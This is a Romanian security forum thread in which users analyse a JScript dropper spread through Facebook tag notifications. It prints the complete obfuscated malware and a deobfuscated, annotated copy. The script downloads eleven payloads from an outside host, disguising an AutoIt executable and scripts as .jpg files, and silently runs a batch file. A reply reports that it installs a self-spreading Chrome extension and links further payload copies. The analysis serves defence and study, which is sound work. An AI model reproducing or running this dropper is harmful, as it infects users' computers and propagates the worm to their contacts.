Church Posted June 26, 2016 Report Share Posted June 26, 2016 Salut, Astazi am fost tag-uit intr-un comment, in momentul in care dai click pe notificare te redirectioneaza catre link Sursa: var _0xe519=["\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x68\x74\x74\x70","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D","\x6F\x70\x65\x6E","\x74\x79\x70\x65","\x77\x72\x69\x74\x65","\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x72\x65\x61\x64","\x73\x61\x76\x65\x54\x6F\x46\x69\x6C\x65","\x63\x6C\x6F\x73\x65","\x47\x45\x54","\x73\x65\x6E\x64","\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74","\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C","\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E","\x25\x41\x50\x50\x44\x41\x54\x41\x25\x5C","\x45\x78\x70\x61\x6E\x64\x45\x6E\x76\x69\x72\x6F\x6E\x6D\x65\x6E\x74\x53\x74\x72\x69\x6E\x67\x73","\x4D\x6F\x7A\x69\x6C\x61","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x41\x75\x74\x6F\x69\x74\x2E\x6A\x70\x67","\x5C\x61\x75\x74\x6F\x69\x74\x2E\x65\x78\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x62\x67\x2E\x6A\x70\x67","\x5C\x62\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x65\x6B\x6C\x2E\x6A\x70\x67","\x5C\x65\x6B\x6C\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x66\x2E\x6A\x70\x67","\x5C
\x66\x66\x2E\x7A\x69\x70","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x6F\x72\x63\x65\x2E\x6A\x70\x67","\x5C\x66\x6F\x72\x63\x65\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x73\x61\x62\x69\x74\x2E\x6A\x70\x67","\x5C\x73\x61\x62\x69\x74\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x70\x67","\x5C\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x73\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x72\x75\x6E\x2E\x6A\x70\x67","\x5C\x72\x75\x6E\x2E\x62\x61\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x75\x70\x2E\x6A\x70\x67","\x5C\x75\x70\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36","\x5C\x70\x69\x6E\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36\x32","\x5C\x70\x69\x6E\x67\x32\x2E\x6A\x73",""];(function(_0xc4a4x1){function _0xc4a4x2(_0xc4a4x2,_0xc4a4x3,_0xc4a4x4){if(!_0xc4a4x3|| !_0xc4a4x2){return null};var _0xc4a4x5=WScript.CreateObject(_0xe519[0]);_0xc4a4x5[_0xe519[1]]= function(){if(_0xc4a4x5[_0xe519[2]]=== 4&& _0xc4a4x5[_0xe519[3]]=== 200){xa= new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa[_0xe519[7]](_0xc4a4x5.ResponseBody);xa[_0xe519[8]]= _0xc4a4x4;stm2= new 
ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](xa[_0xe519[9]]());stm2[_0xe519[10]](_0xc4a4x3,2);stm2[_0xe519[11]]();xa[_0xe519[11]]()}};_0xc4a4x5[_0xe519[5]](_0xe519[12],_0xc4a4x2,false);_0xc4a4x5[_0xe519[13]](null)}function _0xc4a4x6(_0xc4a4x7,_0xc4a4x8){{xa= new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa.LoadFromFile(_0xc4a4x7);ix= new ActiveXObject(_0xe519[4]);ix[_0xe519[5]]();ix[_0xe519[6]]= 1;ix.LoadFromFile(_0xc4a4x8);stm2= new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](ix[_0xe519[9]]());stm2[_0xe519[7]](xa[_0xe519[9]]());xa[_0xe519[11]]();ix[_0xe519[11]]();stm2[_0xe519[10]](_0xc4a4x7,2);stm2[_0xe519[11]]()}}fso= new ActiveXObject(_0xe519[14]);var _0xc4a4x9= new ActiveXObject(_0xe519[15]);_0xc4a4x1= new ActiveXObject(_0xe519[16]);FileDestr= _0xc4a4x9[_0xe519[18]](_0xe519[17]);mozklasor= FileDestr+ _0xe519[19];if(!fso.FolderExists(mozklasor)){fso.CreateFolder(mozklasor)};_0xc4a4x1.ShellExecute(_0xe519[20]);_0xc4a4x2(_0xe519[21],mozklasor+ _0xe519[22],0);_0xc4a4x2(_0xe519[23],mozklasor+ _0xe519[24],0);_0xc4a4x2(_0xe519[25],mozklasor+ _0xe519[26],0);_0xc4a4x2(_0xe519[27],mozklasor+ _0xe519[28],0);_0xc4a4x2(_0xe519[29],mozklasor+ _0xe519[30],0);_0xc4a4x2(_0xe519[31],mozklasor+ _0xe519[32],0);_0xc4a4x2(_0xe519[33],mozklasor+ _0xe519[34],0);_0xc4a4x2(_0xe519[35],mozklasor+ _0xe519[36],0);_0xc4a4x2(_0xe519[37],mozklasor+ _0xe519[38],0);_0xc4a4x2(_0xe519[39],mozklasor+ _0xe519[40],0);_0xc4a4x2(_0xe519[41],mozklasor+ _0xe519[42],0);_0xc4a4x1.ShellExecute(mozklasor+ _0xe519[36],_0xe519[43],mozklasor,_0xe519[43],0)})(this) deobfuscat:

// ANALYSIS NOTES (reviewer annotations on the deobfuscated listing; the code itself is unchanged)
//
// What this is: a Windows Script Host (JScript) downloader. It only runs under
// wscript.exe/cscript.exe, because it relies on WScript.CreateObject and ActiveXObject.
// Flow, as visible in this listing:
//   1. Resolve %APPDATA% and create a sub-folder named "Mozila".
//   2. Open https://www.google.com through Shell.Application (the user sees an ordinary page).
//   3. Fetch 11 URLs over plain HTTP and save each response body into that folder.
//   4. Launch the downloaded run.bat from that folder with a hidden window.
// What the downloaded files do is NOT visible here; a reply in this thread reports AutoIt
// scripts and a Chrome extension that re-posts the link on Facebook.
//
// Indicators a defender can take from this listing:
//   - folder %APPDATA%\Mozila containing autoit.exe, *.au3, run.bat, manifest.json, bg.js, ff.zip
//   - script-host process issuing HTTP GETs for /ext/*.jpg on userexperiencestatics.net
//   - responses requested as ".jpg" but written to disk as .exe / .au3 / .bat / .js / .zip / .json
//   - run.bat started via Shell.Application.ShellExecute with show-state 0 (hidden)
//
// The readable identifiers below (tryIt, readFile, dataAndEvents, mayParseLabeledStatementInstead)
// do not exist in the obfuscated original, which uses _0xc4a4x… names; they carry no meaning
// about the code's purpose.

// String table: every COM ProgID, member name, URL and file name is looked up by index,
// so the indexes are annotated to make the body below readable.
var _0xe519 = [
  "Msxml2.XMLhttp",               // [0]  HTTP client ProgID
  "onreadystatechange",           // [1]
  "readyState",                   // [2]
  "status",                       // [3]
  "ADODB.Stream",                 // [4]  binary stream ProgID, used to write bytes to disk
  "open",                         // [5]
  "type",                         // [6]
  "write",                        // [7]
  "position",                     // [8]
  "read",                         // [9]
  "saveToFile",                   // [10]
  "close",                        // [11]
  "GET",                          // [12]
  "send",                         // [13]
  "Scripting.FileSystemObject",   // [14]
  "WScript.Shell",                // [15]
  "Shell.Application",            // [16]
  "%APPDATA%\\",                  // [17]
  "ExpandEnvironmentStrings",     // [18]
  "Mozila",                       // [19] drop-folder name (note the spelling: not "Mozilla")
  "https://www.google.com",       // [20] page opened for the user before the downloads start
  // [21]..[38]: (URL, local file name) pairs. Every URL path ends in .jpg while the local
  // name carries a different extension, presumably so the traffic looks like image requests.
  "http://userexperiencestatics.net/ext/Autoit.jpg",   // [21]
  "\\autoit.exe",                                      // [22]
  "http://userexperiencestatics.net/ext/bg.jpg",       // [23]
  "\\bg.js",                                           // [24]
  "http://userexperiencestatics.net/ext/ekl.jpg",      // [25]
  "\\ekl.au3",                                         // [26]
  "http://userexperiencestatics.net/ext/ff.jpg",       // [27]
  "\\ff.zip",                                          // [28]
  "http://userexperiencestatics.net/ext/force.jpg",    // [29]
  "\\force.au3",                                       // [30]
  "http://userexperiencestatics.net/ext/sabit.jpg",    // [31]
  "\\sabit.au3",                                       // [32]
  "http://userexperiencestatics.net/ext/manifest.jpg", // [33]
  "\\manifest.json",                                   // [34]
  "http://userexperiencestatics.net/ext/run.jpg",      // [35]
  "\\run.bat",                                         // [36] the file executed at the end
  "http://userexperiencestatics.net/ext/up.jpg",       // [37]
  "\\up.au3",                                          // [38]
  // [39]..[42]: two requests to a third-party visitor-counter URL, saved as .js files.
  // NOTE(review): looks like install/hit counting - not confirmed by anything in this listing.
  "http://whos.amung.us/pingjs/?k=pingjse346",         // [39]
  "\\ping.js",                                         // [40]
  "http://whos.amung.us/pingjs/?k=pingjse3462",        // [41]
  "\\ping2.js",                                        // [42]
  ""                                                   // [43] empty string, passed as ShellExecute arguments/verb
];
(function(dataAndEvents) {
  /**
   * Download one URL and write the response body to a local file.
   *
   * @param {string} f - URL to fetch (a string-table entry at every call site).
   * @param {string} o - Destination path; an existing file is overwritten.
   * @param {number} mayParseLabeledStatementInstead - Stream position set before the
   *     copy; every call in this listing passes 0, i.e. the whole body is written.
   * @return {null|undefined} null when either f or o is falsy, otherwise nothing.
   */
  function tryIt(f, o, mayParseLabeledStatementInstead) {
    if (!o || !f) {
      return null;
    }
    var xhr = WScript.CreateObject(_0xe519[0]);   // Msxml2.XMLhttp
    // onreadystatechange: act only on a completed request (readyState 4) with HTTP 200.
    // Any other status is ignored silently, so a failed download leaves no file and no error.
    xhr[_0xe519[1]] = function() {
      if (xhr[_0xe519[2]] === 4 && xhr[_0xe519[3]] === 200) {
        // xa and stm2 are assigned without var, so they are script-wide globals
        // shared with readFile() below.
        xa = new ActiveXObject(_0xe519[4]);       // ADODB.Stream
        xa[_0xe519[5]]();                         // open()
        xa[_0xe519[6]] = 1;                       // type = 1 (binary)
        xa[_0xe519[7]](xhr.ResponseBody);         // write(raw response bytes)
        xa[_0xe519[8]] = mayParseLabeledStatementInstead;   // position = offset to read from
        stm2 = new ActiveXObject(_0xe519[4]);     // second ADODB.Stream, used for saving
        stm2[_0xe519[6]] = 1;                     // type = 1 (binary)
        stm2[_0xe519[5]]();                       // open()
        stm2[_0xe519[7]](xa[_0xe519[9]]());       // write(xa.read()) - copy from the offset onward
        stm2[_0xe519[10]](o, 2);                  // saveToFile(o, 2): 2 = create or overwrite
        stm2[_0xe519[11]]();                      // close()
        xa[_0xe519[11]]();                        // close()
      }
    };
    xhr[_0xe519[5]](_0xe519[12], f, false);       // open("GET", f, false): synchronous request
    xhr[_0xe519[13]](null);                       // send(null)
  }
  /**
   * Rewrite `filename` so that it holds the bytes of `path` followed by its own
   * original bytes (both files are loaded as binary streams).
   * No call to this function appears anywhere in this listing.
   *
   * @param {string} filename - File that is read and then overwritten in place.
   * @param {string} path - File whose bytes are written first.
   * @return {undefined}
   */
  function readFile(filename, path) {
    xa = new ActiveXObject(_0xe519[4]);           // ADODB.Stream holding `filename`
    xa[_0xe519[5]]();                             // open()
    xa[_0xe519[6]] = 1;                           // type = 1 (binary)
    xa.LoadFromFile(filename);
    ix = new ActiveXObject(_0xe519[4]);           // ADODB.Stream holding `path`
    ix[_0xe519[5]]();                             // open()
    ix[_0xe519[6]] = 1;                           // type = 1 (binary)
    ix.LoadFromFile(path);
    stm2 = new ActiveXObject(_0xe519[4]);         // output stream
    stm2[_0xe519[6]] = 1;                         // type = 1 (binary)
    stm2[_0xe519[5]]();                           // open()
    stm2[_0xe519[7]](ix[_0xe519[9]]());           // write(ix.read()) - `path` bytes first
    stm2[_0xe519[7]](xa[_0xe519[9]]());           // write(xa.read()) - then `filename` bytes
    xa[_0xe519[11]]();                            // close()
    ix[_0xe519[11]]();                            // close()
    stm2[_0xe519[10]](filename, 2);               // saveToFile(filename, 2): overwrite
    stm2[_0xe519[11]]();                          // close()
  }
  // --- main sequence ---
  fso = new ActiveXObject(_0xe519[14]);           // Scripting.FileSystemObject
  var fo = new ActiveXObject(_0xe519[15]);        // WScript.Shell
  dataAndEvents = new ActiveXObject(_0xe519[16]); // Shell.Application (the IIFE argument is discarded)
  FileDestr = fo[_0xe519[18]](_0xe519[17]);       // ExpandEnvironmentStrings("%APPDATA%\\")
  mozklasor = FileDestr + _0xe519[19];            // drop folder: %APPDATA%\Mozila
  if (!fso.FolderExists(mozklasor)) {
    fso.CreateFolder(mozklasor);
  }
  // Opens https://www.google.com with the default handler; this is the only
  // user-visible effect of running the script.
  dataAndEvents.ShellExecute(_0xe519[20]);
  // Eleven synchronous downloads into the drop folder (see the string table for each pair).
  tryIt(_0xe519[21], mozklasor + _0xe519[22], 0);   // Autoit.jpg   -> autoit.exe
  tryIt(_0xe519[23], mozklasor + _0xe519[24], 0);   // bg.jpg       -> bg.js
  tryIt(_0xe519[25], mozklasor + _0xe519[26], 0);   // ekl.jpg      -> ekl.au3
  tryIt(_0xe519[27], mozklasor + _0xe519[28], 0);   // ff.jpg       -> ff.zip
  tryIt(_0xe519[29], mozklasor + _0xe519[30], 0);   // force.jpg    -> force.au3
  tryIt(_0xe519[31], mozklasor + _0xe519[32], 0);   // sabit.jpg    -> sabit.au3
  tryIt(_0xe519[33], mozklasor + _0xe519[34], 0);   // manifest.jpg -> manifest.json
  tryIt(_0xe519[35], mozklasor + _0xe519[36], 0);   // run.jpg      -> run.bat
  tryIt(_0xe519[37], mozklasor + _0xe519[38], 0);   // up.jpg       -> up.au3
  tryIt(_0xe519[39], mozklasor + _0xe519[40], 0);   // counter URL  -> ping.js
  tryIt(_0xe519[41], mozklasor + _0xe519[42], 0);   // counter URL  -> ping2.js
  // ShellExecute(file, args, dir, verb, show): runs %APPDATA%\Mozila\run.bat with empty
  // arguments and verb, the drop folder as working directory, and show = 0 (hidden window).
  // No check is made that the download succeeded before the file is launched.
  dataAndEvents.ShellExecute(mozklasor + _0xe519[36], _0xe519[43], mozklasor, _0xe519[43], 0);
})(this);
Nu imi dau seama ce face, dar pare interesant. Quote Link to comment Share on other sites More sharing options...
dancezar (Active Members) Posted June 26, 2016 (edited) L-am instalat pe o masina virtuala :))) Pare sa fie targetat pentru Chrome. Baga in %appdata% un folder Mozila, in care sunt niste script-uri AutoIt impreuna cu compilatorul AutoIt. Iti instaleaza in Chrome o extensie folosita ca sa trimita acel link si altor persoane. Acesta e script-ul folosit pe Facebook: http://pastebin.com/9UDBCg0c Script-ul extensiei Chrome: http://pastebin.com/mF0LtMZK Daca te duci pe chrome://extensions o sa te redirectioneze :))) In final nu stiu care este scopul lui si de ce se raspandeste. https://www.sendspace.com/file/88v34k http://appcdn.co/data.js?r - daca intri de pe Chrome o sa te redirectioneze catre diferite domenii unde e tinut script-ul pentru Facebook; daca intri de pe Firefox o sa iti dea jQuery. Edited June 26, 2016 by danyweb09